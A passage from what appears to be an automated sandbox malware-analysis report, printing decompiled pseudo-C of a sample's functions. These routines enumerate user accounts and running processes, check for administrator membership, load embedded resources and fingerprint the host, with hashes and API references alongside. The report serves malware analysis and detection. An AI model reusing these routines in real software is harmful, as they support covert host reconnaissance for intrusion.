								_a8( *(_v28 + _v8 * 4), _v544, _a12);
								_t87 = _t87 + 0xc;
								Sleep(0xa); // executed
								L8:
								_v8 = _v8 + 1;
								continue;
							}
							while(0 != 0) {
							}
							goto L8;
						}
						while(0 != 0) {
						}
						goto L8;
					}
					NetApiBufferFree(_v28);
					return 0;
				}
				while(0 != 0) {
				}
				return 0xffffffff;
			}

0x00410ba9
0x00410bb0
0x00410bb7
0x00410bbe
0x00410bc2
0x00410bde
0x00410be3
0x00410bea
0x00410bfa
0x00410c0c
0x00410c18
0x00410c22
0x00410c51
0x00410c5e
0x00410c63
0x00410c66
0x00410c73
0x00410c7d
0x00410cbe
0x00410ce0
0x00410ce3
0x00410ce8
0x00410c03
0x00410c09
0x00000000
0x00410c09
0x00410cc0
0x00410cc4
0x00000000
0x00410cc6
0x00410c75
0x00410c79
0x00000000
0x00410c7b
0x00410cf7
0x00000000
0x00410cfc
0x00410bec
0x00410bf0
0x00000000

APIs

NetUserEnum.NETAPI32(?,00000000,00000002,?,000000FF,?,?,?), ref: 00410BDE
LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00410C51

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

LookupAccountNameW.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00410CB6
Sleep.KERNELBASE(0000000A), ref: 00410CE8
NetApiBufferFree.NETAPI32(?,?,00000000,00000002,?,000000FF,?,?,?), ref: 00410CF7

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AccountLookupName$AllocateBufferEnumFreeHeapSleepUser
String ID:
API String ID: 745096986-0
Opcode ID: 32912222d3959bd5192db333e3ceaacebe6a015536d81682f0131d97eb2f288e
Instruction ID: 647789aa826631b9fcff20b5cd979fedb7f1145cdb6297246e645e81bdfaeae2
Opcode Fuzzy Hash: 32912222d3959bd5192db333e3ceaacebe6a015536d81682f0131d97eb2f288e
Instruction Fuzzy Hash: 444150B1904108EBDB14DFD4D999FEEB778AB48304F10828AE115A7280E7B4ABC5CF95

Uniqueness

Uniqueness Score: 1.74%

Function 00404290, Relevance: 7.6, APIs: 5, Instructions: 91
processCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00404290(intOrPtr _a4, intOrPtr _a8) {
				void* _v300;
				void* _v304;
				intOrPtr _v308;
				int _v312;
				char _v313;
				char _v328;
				intOrPtr _v332;
				signed int _t32;
				int _t35;
				intOrPtr _t38;
				int _t40;
				void* _t50;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_v308 = 1;
				while(0 != 0) {
				}
				_t32 = CreateToolhelp32Snapshot(2, 0); // executed
				_v304 = _t32;
				if(_v304 != 0xffffffff) {
					E00404120(_t50,  &_v300, 0, 0x128);
					_t65 = _t64 + 0xc;
					_v300 = 0x128;
					_t51 = _v304;
					_t35 = Process32First(_v304,  &_v300); // executed
					if(_t35 != 0) {
						_v312 = 0;
						_v332 = 0xf;
						_v313 = 0;
						_v312 = 0;
						while(_v312 < _v332) {
							 *((char*)(_t63 + _v312 - 0x144)) = _v312 + 0x41;
							_t51 = _v312 + 1;
							_v312 = _v312 + 1;
						}
						E00404690(_t51,  &_v328);
						_t66 = _t65 + 4;
						while(1) {
							_t38 = _a4( &_v300, _a8);
							_t66 = _t66 + 8;
							_v308 = _t38;
							if(_v308 == 0) {
								break;
							}
							_t40 = Process32Next(_v304,  &_v300); // executed
							if(_t40 != 0) {
								continue;
							}
							L19:
							while(0 != 0) {
							}
							CloseHandle(_v304); // executed
							if(_v308 != 0) {
								return 0;
							}
							return 1;
						}
						goto L19;
					}
					while(0 != 0) {
					}
					CloseHandle(_v304);
					return 0xfffffffe;
				}
				while(0 != 0) {
				}
				return _t32 | 0xffffffff;
			}

0x00404299
0x004042a3
0x004042a7
0x004042ad
0x004042b3
0x004042c0
0x004042de
0x004042e3
0x004042e6
0x004042f7
0x004042fe
0x00404306
0x00404325
0x0040432f
0x00404339
0x00404340
0x0040435b
0x00404378
0x00404352
0x00404355
0x00404355
0x00404388
0x0040438d
0x00404390
0x0040439b
0x0040439e
0x004043a1
0x004043ae
0x00000000
0x00000000
0x004043c0
0x004043c8
0x00000000
0x00000000
0x00000000
0x004043ca
0x004043ce
0x004043d7
0x004043e4
0x00000000
0x004043ed
0x00000000
0x004043e6
0x00000000
0x004043b0
0x00404308
0x0040430c
0x00404315
0x00000000
0x0040431b
0x004042c2
0x004042c6
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004042AD
Process32First.KERNEL32(000000FF,00000128), ref: 004042FE
CloseHandle.KERNEL32(000000FF), ref: 00404315
Process32Next.KERNEL32(000000FF,00000128), ref: 004043C0
CloseHandle.KERNELBASE(000000FF), ref: 004043D7

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: c355215933444da7a818c795493b7fee421ae41a4478d999e50abfc51a298357
Instruction ID: 257ce3f240093b868ae49664a53a1431c4029ee12e5a1ad35108bed1c7ad7c0f
Opcode Fuzzy Hash: c355215933444da7a818c795493b7fee421ae41a4478d999e50abfc51a298357
Instruction Fuzzy Hash: DF3165B0B022189BCB20DB64DC457EE7774AB94314F1056FAEA09B62D0D7789F91CF49

Uniqueness

Uniqueness Score: 0.68%

Function 00407550, Relevance: 6.1, APIs: 4, Instructions: 89
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00407550(void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				signed int _v32;
				long _v36;
				long _t37;

				_v36 = 0;
				_v8 = 0;
				_v28.Value = 0;
				_v27 = 0;
				_v26 = 0;
				_v25 = 0;
				_v24 = 0;
				_v23 = 5;
				_v12 = E00407230(__ecx, 8);
				if(_v12 != 0) {
					_t37 = E004072A0(_v12, 2,  &_v20); // executed
					_v8 = _t37;
					if(_v8 != 0) {
						if(AllocateAndInitializeSid( &_v28, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16) != 0) {
							_v36 = 0;
							_v32 = 0;
							while(_v32 <  *_v8) {
								if(EqualSid( *(_v8 + 4 + _v32 * 8), _v16) == 0) {
									_v32 = _v32 + 1;
									continue;
								}
								_v36 = 1;
								break;
							}
							FreeSid(_v16);
							L15:
							CloseHandle(_v12); // executed
							if(_v8 != 0) {
								E00403F10( &_v8, 0);
							}
							return _v36;
						}
						while(0 != 0) {
						}
						goto L15;
					}
					goto L15;
				}
				return 0;
			}

0x00407556
0x0040755d
0x00407564
0x00407568
0x0040756c
0x00407570
0x00407574
0x00407578
0x00407586
0x0040758d
0x004075a0
0x004075a8
0x004075af
0x004075db
0x004075e5
0x004075ec
0x004075fe
0x0040761f
0x004075fb
0x00000000
0x004075fb
0x00407621
0x00000000
0x00407621
0x00407630
0x00407636
0x0040763a
0x00407644
0x0040764c
0x00407651
0x00000000
0x00407654
0x004075dd
0x004075e1
0x00000000
0x004075e3
0x00000000
0x004075b1
0x00000000

APIs

Part of subcall function 00407230: GetCurrentThread.KERNEL32(00407583,00000000,00000008,?,?,00407583,00000008), ref: 0040723E
Part of subcall function 00407230: OpenThreadToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 00407245
Part of subcall function 00407230: GetLastError.KERNEL32(?,?,00407583,00000008), ref: 0040724F
Part of subcall function 00407230: GetCurrentProcess.KERNEL32(00407583,00000008,?,?,00407583,00000008), ref: 00407264
Part of subcall function 00407230: OpenProcessToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 0040726B

CloseHandle.KERNELBASE(00000000), ref: 0040763A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$CloseErrorHandleLast
String ID:
API String ID: 664640673-0
Opcode ID: f3d991a22bfecef892f491893ab4f6e069b7eb44900a393e3662df262718123e
Instruction ID: ac3878bae9f50b294fadf58e4a5df531a3aabf7a28bf01f64f83dfc4b50f5d4f
Opcode Fuzzy Hash: f3d991a22bfecef892f491893ab4f6e069b7eb44900a393e3662df262718123e
Instruction Fuzzy Hash: EB315274E08209EBDB10CBE4C849BEFBBB4AB54304F10846AD502772C1D7796A45DBAB

Uniqueness

Uniqueness Score: 0.03%

Function 00409C00, Relevance: 5.2, Strings: 4, Instructions: 167
UNIQUELIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 64%

			E00409C00() {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				signed int _v280;
				char _v284;
				char _t125;
				void* _t159;
				void* _t160;
				void* _t161;

				_v8 = 0;
				_v280 = 0;
				_v276 = 1;
				_v272 = 0x226;
				_v268 = 0;
				_v264 = 0;
				_v260 = 2;
				_v256 = 0x85b;
				_v252 = 0;
				_v248 = 0;
				_v244 = 4;
				_v240 = 0x2b0b;
				_v236 = 0;
				_v232 = 0;
				_v228 = 8;
				_v224 = 0x1f2d;
				_v220 = 0;
				_v216 = 0;
				_v212 = 0x10;
				_v208 = 0x1c66;
				_v204 = 0;
				_v200 = 0;
				_v196 = 0x20;
				_v192 = 0x268a;
				_v188 = 0;
				_v184 = 0;
				_v180 = 0x40;
				_v176 = 0x1a74;
				_v172 = 0;
				_v168 = 0;
				_v164 = 0x80;
				_v160 = 0x1ba7;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0x100;
				_v144 = 0xade;
				_v140 = 0;
				_v136 = 0;
				_v132 = 0x200;
				_v128 = 0x2387;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0x400;
				_v112 = 0x1b1d;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0x800;
				_v96 = 0x2c63;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0x1000;
				_v80 = 0x225f;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0x2000;
				_v64 = 0x1f0f;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0x4000;
				_v48 = 0x279e;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0x8000;
				_v32 = 0x108;
				_v28 = 0;
				_v24 = 0;
				_v280 = 0x10;
				_v8 = 0;
				while(_v8 < _v280) {
					_t125 = E00408060( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)),  *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)));
					_t160 = _t160 + 4;
					_v284 = _t125;
					if(_v284 != 0) {
						 *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) = E00404E30(_v284, 0x3b, 0, _t159 + (_v8 << 4) - 0x108);
						E00408170( &_v284);
						_t160 = _t160 + 0x14;
					}
					_v8 = _v8 + 1;
				}
				_v12 =  &_v276;
				_v16 = _v280;
				_v20 = 0;
				E00404290(E00409B20,  &_v20); // executed
				_t161 = _t160 + 8;
				if(_v20 != 0) {
					while(0 != 0) {
					}
				} else {
					while(0 != 0) {
					}
				}
				_v8 = 0;
				while(_v8 < _v280) {
					if( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) != 0) {
						E004051C0(_t159 + (_v8 << 4) - 0x104, _t159 + (_v8 << 4) - 0x108);
						_t161 = _t161 + 8;
					}
					_v8 = _v8 + 1;
				}
				return _v20;
			}

0x00409c09
0x00409c10
0x00409c1a
0x00409c24
0x00409c30
0x00409c36
0x00409c3c
0x00409c46
0x00409c52
0x00409c58
0x00409c5e
0x00409c68
0x00409c74
0x00409c7a
0x00409c80
0x00409c8a
0x00409c96
0x00409c9c
0x00409ca2
0x00409cac
0x00409cb8
0x00409cbe
0x00409cc4
0x00409cce
0x00409cda
0x00409ce0
0x00409ce6
0x00409cf0
0x00409cfc
0x00409d02
0x00409d08
0x00409d12
0x00409d1e
0x00409d24
0x00409d2a
0x00409d34
0x00409d40
0x00409d46
0x00409d4c
0x00409d53
0x00409d5c
0x00409d5f
0x00409d62
0x00409d69
0x00409d72
0x00409d75
0x00409d78
0x00409d7f
0x00409d88
0x00409d8b
0x00409d8e
0x00409d95
0x00409d9e
0x00409da1
0x00409da4
0x00409dab
0x00409db4
0x00409db7
0x00409dba
0x00409dc1
0x00409dca
0x00409dcd
0x00409dd0
0x00409dd7
0x00409de0
0x00409de3
0x00409de6
0x00409df0
0x00409e02
0x00409e1b
0x00409e20
0x00409e23
0x00409e30
0x00409e59
0x00409e67
0x00409e6c
0x00409e6c
0x00409dff
0x00409dff
0x00409e77
0x00409e80
0x00409e83
0x00409e93
0x00409e98
0x00409e9f
0x00409ea9
0x00409ead
0x00409ea1
0x00409ea1
0x00409ea5
0x00409ea7
0x00409eaf
0x00409ec1
0x00409eda
0x00409ef8
0x00409efd
0x00409efd
0x00409ebe
0x00409ebe
0x00409f08

Strings

c,, xrefs: 00409D7F
@, xrefs: 00409CE6
, xrefs: 00409CC4
_", xrefs: 00409D95

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID: $@$_"$c,
API String ID: 0-851856876
Opcode ID: 2d0e49c3e170af6a6fe3fa70ffbc45546a3b1d3e46aeb57172ec56ddae94edd3
Instruction ID: ade81d662acfda8622b0b30e924b4c71256ff4758d34bc6008ad811e789fd58d
Opcode Fuzzy Hash: 2d0e49c3e170af6a6fe3fa70ffbc45546a3b1d3e46aeb57172ec56ddae94edd3
Instruction Fuzzy Hash: FF81D4B0D04218CBEB68CF99D9457DEBAF1BB48304F2081AAD10DB7281D7791A89CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00408290, Relevance: 4.7, APIs: 3, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00408290(void* __fp0, struct HINSTANCE__* _a4, CHAR* _a8, signed int _a12, signed int _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				long _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct HRSRC__* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _t73;
				signed int _t83;
				signed int _t84;
				signed int _t87;
				signed int _t96;
				signed int _t114;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t136;

				_t136 = __fp0;
				_v28 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_v40 = 0;
				_v8 = 0;
				_v36 = 0xa;
				_v32 = 3;
				while(0 != 0) {
				}
				_v20 = 0;
				while(1) {
					__eflags = _v20 - 2;
					if(__eflags >= 0) {
						break;
					}
					_t96 = E00408A50(__eflags, _t136, 0x4201bc, 0x1e, 0x32);
					_t130 = _t130 + 0xc;
					_v28 = FindResourceA(_a4, _a8, _t96 *  *0x41ffac +  *((intOrPtr*)(_t129 + _v20 * 4 - 0x20)));
					__eflags = _v28;
					if(_v28 == 0) {
						_t114 = _v20 + 1;
						__eflags = _t114;
						_v20 = _t114;
						continue;
					}
					break;
				}
				__eflags = _v28;
				if(_v28 != 0) {
					_v12 = SizeofResource(_a4, _v28);
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t102 = _v28;
					_v16 = LoadResource(_a4, _v28);
					__eflags = _v16;
					if(_v16 != 0) {
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							_t73 = E00403F80(_t102, _v16, _v12);
							_t131 = _t130 + 8;
							_v8 = _t73;
							__eflags = _v8;
							if(_v8 != 0) {
								L47:
								__eflags = _a12;
								if(_a12 != 0) {
									 *_a12 = _v12;
								}
								return _v8;
							} else {
								goto L42;
							}
							while(1) {
								L42:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							__eflags = _a24;
							if(_a24 != 0) {
								 *_a24 = 0xfffffffb;
							}
							L50:
							__eflags = _v40;
							if(_v40 != 0) {
								_push(0);
								E00405C10( &_v40);
							}
							__eflags = 0;
							return 0;
						}
						asm("sbb eax, eax");
						_t83 = E00405610(_a20, _v16, _v12, _a20,  ~(_a16 & 0x00000002) & 0x00000004); // executed
						_t131 = _t130 + 0x10;
						_v40 = _t83;
						__eflags = _v40;
						if(_v40 != 0) {
							_t84 = _v40;
							_t106 =  *((intOrPtr*)(_t84 + 0x428));
							_v12 =  *((intOrPtr*)(_t84 + 0x428));
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t87 = E00403EE0(_t106, _v12 + 1);
							_t131 = _t131 + 4;
							_v8 = _t87;
							__eflags = _v8;
							if(_v8 != 0) {
								E00404040(_v40, _v8,  *((intOrPtr*)(_v40 + 0x424)), _v12);
								_push(0);
								E00405C10( &_v40);
								goto L47;
							} else {
								goto L35;
							}
							while(1) {
								L35:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							__eflags = _a24;
							if(_a24 != 0) {
								 *_a24 = 0xfffffffc;
							}
							goto L50;
						} else {
							goto L26;
						}
						while(1) {
							L26:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						__eflags = _a24;
						if(_a24 != 0) {
							 *_a24 = 0xfffffffd;
						}
						goto L50;
					} else {
						goto L19;
					}
					while(1) {
						L19:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					__eflags = _a24;
					if(_a24 != 0) {
						 *_a24 = 0xfffffffe;
					}
					return 0;
				} else {
					goto L10;
				}
				while(1) {
					L10:
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a24;
				if(_a24 != 0) {
					 *_a24 = 0xffffffff;
				}
				return 0;
			}

0x00408290
0x00408296
0x0040829d
0x004082a4
0x004082ab
0x004082b2
0x004082b9
0x004082c0
0x004082c7
0x004082ce
0x004082d5
0x004082d9
0x004082db
0x004082ed
0x004082ed
0x004082f1
0x00000000
0x00000000
0x004082fc
0x00408301
0x00408321
0x00408324
0x00408328
0x004082e7
0x004082e7
0x004082ea
0x00000000
0x004082ea
0x00000000
0x0040832a
0x0040832e
0x00408332
0x0040835e
0x00408361
0x00408361
0x00408363
0x00000000
0x00000000
0x00408365
0x00408367
0x00408375
0x00408378
0x0040837c
0x0040839d
0x004083a0
0x0040845e
0x00408463
0x00408466
0x00408469
0x0040846d
0x00408486
0x00408486
0x0040848a
0x00408492
0x00408492
0x00000000
0x00000000
0x00000000
0x00000000
0x0040846f
0x0040846f
0x0040846f
0x00408471
0x00000000
0x00000000
0x00408473
0x00408475
0x00408479
0x0040847e
0x0040847e
0x00408499
0x00408499
0x0040849d
0x0040849f
0x004084a5
0x004084aa
0x004084ad
0x00000000
0x004084ad
0x004083ae
0x004083c0
0x004083c5
0x004083c8
0x004083cb
0x004083cf
0x004083eb
0x004083ee
0x004083f4
0x004083f7
0x004083f7
0x004083f9
0x00000000
0x00000000
0x004083fb
0x00408404
0x00408409
0x0040840c
0x0040840f
0x00408413
0x0040843e
0x00408446
0x0040844c
0x00000000
0x00000000
0x00000000
0x00000000
0x00408415
0x00408415
0x00408415
0x00408417
0x00000000
0x00000000
0x00408419
0x0040841b
0x0040841f
0x00408424
0x00408424
0x00000000
0x00000000
0x00000000
0x00000000
0x004083d1
0x004083d1
0x004083d1
0x004083d3
0x00000000
0x00000000
0x004083d5
0x004083d7
0x004083db
0x004083e0
0x004083e0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040837e
0x0040837e
0x0040837e
0x00408380
0x00000000
0x00000000
0x00408382
0x00408384
0x00408388
0x0040838d
0x0040838d
0x00000000
0x00000000
0x00000000
0x00000000
0x00408334
0x00408334
0x00408334
0x00408336
0x00000000
0x00000000
0x00408338
0x0040833a
0x0040833e
0x00408343
0x00408343
0x00000000

APIs

FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 0040831B
SizeofResource.KERNEL32(00000000,00000000), ref: 00408358
LoadResource.KERNEL32(00000000,00000000), ref: 0040836F

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: b42b42e485bacebcb556b26e65a96e9c6663746946f4b78872549425bbc3c28c
Instruction ID: 7c43bebf739c045896d0570a89faba435060fa8f01e04a4bc11d3112616bd297
Opcode Fuzzy Hash: b42b42e485bacebcb556b26e65a96e9c6663746946f4b78872549425bbc3c28c
Instruction Fuzzy Hash: 65616FB490020ADBCF14CF94CA457EF77B4AB88304F14856EE991B73C0DB799A41CB9A

Uniqueness

Uniqueness Score: 0.58%

Function 005C2A35, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 005C2ABA

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6dd37024c09a746a2b846ee4762fc8c4a1a12d616a4dae3fbf6f653f59ae0f61
Instruction ID: 51e6b98b07ca1f7869e5ef10bd457befe8c9df51aa159615e26099113aa8d452
Opcode Fuzzy Hash: 6dd37024c09a746a2b846ee4762fc8c4a1a12d616a4dae3fbf6f653f59ae0f61
Instruction Fuzzy Hash: A72136B1E002098FCB14DFA9D850AAEBBF1FF88700F25816AE805AB340D774AD41CF95

Uniqueness

Uniqueness Score: 0.01%

Function 00409F40, Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00409F40() {
				signed int _v8;
				struct _SYSTEM_INFO _v44;

				_v8 = 0;
				if( *0x41f800 == 0) {
					GetSystemInfo( &_v44); // executed
					_v8 = _v44.dwOemId;
				} else {
					_v8 = 9;
				}
				if((_v8 & 0x0000ffff) != 9) {
					if((_v8 & 0x0000ffff) != 0) {
						while(0 != 0) {
						}
					} else {
						while(0 != 0) {
						}
					}
				} else {
					while(0 != 0) {
					}
				}
				return _v8;
			}

0x00409f48
0x00409f53
0x00409f64
0x00409f6e
0x00409f55
0x00409f5a
0x00409f5a
0x00409f79
0x00409f89
0x00409f93
0x00409f97
0x00409f8b
0x00409f8b
0x00409f8f
0x00409f91
0x00409f7b
0x00409f7b
0x00409f7f
0x00409f81
0x00409fa0

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,0040A541,?), ref: 00409F64

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 39af4bf24daea00aff064fbe3000edea49d5825a2054e32915b128746e9e8bea
Instruction ID: 7c4579a214f2a90cb6eecf1467360cb16e83cc79cfd483ed66f37f55aa517aa5
Opcode Fuzzy Hash: 39af4bf24daea00aff064fbe3000edea49d5825a2054e32915b128746e9e8bea
Instruction Fuzzy Hash: 5EF06214A1920BD5CB54DBA185002FEB275AB44705F24857FEC02F62C2F7788E82E35E

Uniqueness

Uniqueness Score: 0.02%

Function 004097A0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(?,00000100), ref: 00409803
lstrcpynW.KERNEL32(?,?,00000100), ref: 00409819
GetVolumeInformationW.KERNELBASE(c:\,?,00000100,?,00000000,00000000,?,00000100), ref: 00409844
lstrlenW.KERNEL32(?,0041881C,?), ref: 00409868
lstrlenW.KERNEL32(?,00000100), ref: 0040987A
lstrcatW.KERNEL32(?,?), ref: 00409897
lstrlenW.KERNEL32(?), ref: 004098A1
CharUpperBuffW.USER32(?,00000100), ref: 004098B8
lstrlenW.KERNEL32(?,00000000), ref: 004098CA

Strings

c:\, xrefs: 0040983F

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$BuffCharComputerInformationNameUpperVolumelstrcatlstrcpyn
String ID: c:\
API String ID: 508321404-4070862797
Opcode ID: fc939f2683d08ef28eef11811c2ae4cd3f10a95d5d387009721638586382ca54
Instruction ID: 3500dc734f40f94b5a5425aa7a5f8c393bd0344a4e94ee7f5f80e67062430d21
Opcode Fuzzy Hash: fc939f2683d08ef28eef11811c2ae4cd3f10a95d5d387009721638586382ca54
Instruction Fuzzy Hash: 153163B5910208BFDB10DFA4DC45BEA3779AB88300F00C1A9B6059B2C1DB759A84CB98

Uniqueness

Uniqueness Score: 5.54%

Function 0040EF00, Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 405
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0040EF00(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, CHAR* _a20) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				WCHAR* _v32;
				signed int _v36;
				char _v72;
				signed int _v76;
				char _v92;
				signed int _v96;
				signed int _v100;
